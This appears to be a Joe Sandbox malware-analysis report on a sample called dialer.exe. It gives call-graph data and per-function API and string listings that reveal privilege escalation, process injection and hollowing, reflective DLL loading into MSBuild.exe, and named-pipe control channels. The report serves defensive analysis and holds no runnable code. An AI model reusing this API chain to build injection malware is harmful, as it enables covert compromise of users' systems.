1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 CloseHandle 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 CloseHandle 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                                Callgraph

                                                                                Executed Functions

                                                                                Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                • API String ID: 4177739653-1130149537
                                                                                • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                                • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                                Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                • API String ID: 2561231171-3753927220
                                                                                • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                                • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                                Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                • String ID:
                                                                                • API String ID: 4084875642-0
                                                                                • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                                • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                                Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                • String ID:
                                                                                • API String ID: 3197395349-0
                                                                                • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                                • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                                Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                                Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                                Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                                Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                                Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                                Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                                Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.2150397752.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 00000017.00000002.2150376497.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150417261.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000017.00000002.2150435020.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
